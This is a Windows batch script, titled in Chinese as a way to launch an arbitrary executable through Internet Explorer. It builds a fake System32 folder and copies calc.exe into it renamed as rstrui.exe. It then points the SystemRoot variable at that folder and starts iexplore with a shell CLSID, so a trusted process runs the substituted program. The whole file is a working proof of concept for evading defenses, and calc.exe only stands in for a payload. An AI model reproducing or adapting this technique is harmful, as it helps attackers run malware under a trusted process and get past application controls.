通过IE启动任意exe

invoke_exe_via_ie.bat

@echo off

set TmpRoot=%~dp0tmproot
set TmpSys=%TmpRoot%\System32
set RealSys=%SystemRoot%\System32

if exist %TmpRoot% (
    RMDIR /Q /S %TmpRoot%
)

mkdir %TmpRoot%
mkdir %TmpSys%

@REM for /R %RealSys% %%a IN (*.dll) DO COPY %%a %TmpSys% /Y > NUL

@REM dlls iexplore.exe needed
copy %RealSys%\rmclient.DLL %TmpSys%
copy %RealSys%\msctf.DLL %TmpSys%
copy %RealSys%\FWPUCLNT.DLL %TmpSys%
copy %RealSys%\rsaenh.dll %TmpSys%
copy %RealSys%\windows.storage.dll %TmpSys%
copy %RealSys%\WindowsCodecs.dll %TmpSys%
copy %RealSys%\wldp.dll %TmpSys%
copy %RealSys%\DataExchange.dll %TmpSys%
copy %RealSys%\dcomp.dll %TmpSys%
copy %RealSys%\d3d11.dll %TmpSys%
copy %RealSys%\dxgi.dll %TmpSys%
copy %RealSys%\twinapi.appcore.dll %TmpSys%
copy %RealSys%\mswsock.dll %TmpSys%
copy %RealSys%\ExplorerFrame.dll %TmpSys%
copy %RealSys%\propsys.dll %TmpSys%

@REM dlls calc.exe (which named rstrui.exe) needed
copy %RealSys%\dwmapi.dll %TmpSys%
copy %RealSys%\pdh.dll %TmpSys%
copy %RealSys%\twinui.dll %TmpSys%
copy %RealSys%\cryptbase.dll %TmpSys%
copy %RealSys%\urlmon.dll %TmpSys%
copy %RealSys%\srvcli.dll %TmpSys%
copy %RealSys%\netutils.dll %TmpSys%
copy %RealSys%\iertutil.dll %TmpSys%
copy %RealSys%\edputil.dll %TmpSys%
copy %RealSys%\secur32.dll %TmpSys%
copy %RealSys%\sspicli.dll %TmpSys%
copy %RealSys%\mlang.dll %TmpSys%
copy %RealSys%\wininet.dll %TmpSys%
copy %RealSys%\profapi.dll %TmpSys%
copy %RealSys%\msvcp110_win.dll %TmpSys%
copy %RealSys%\twinui.appcore.dll %TmpSys%
copy %RealSys%\execmodelproxy.dll %TmpSys%

@REM copy target exe and rename to rstrui.exe
copy C:\Windows\System32\calc.exe %TmpSys%\rstrui.exe

@REM change SystemRoot environment value
set SystemRoot=%TmpRoot%

@REM use iexplore.exe to start rstrui.exe (real target exe)
start iexplore shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}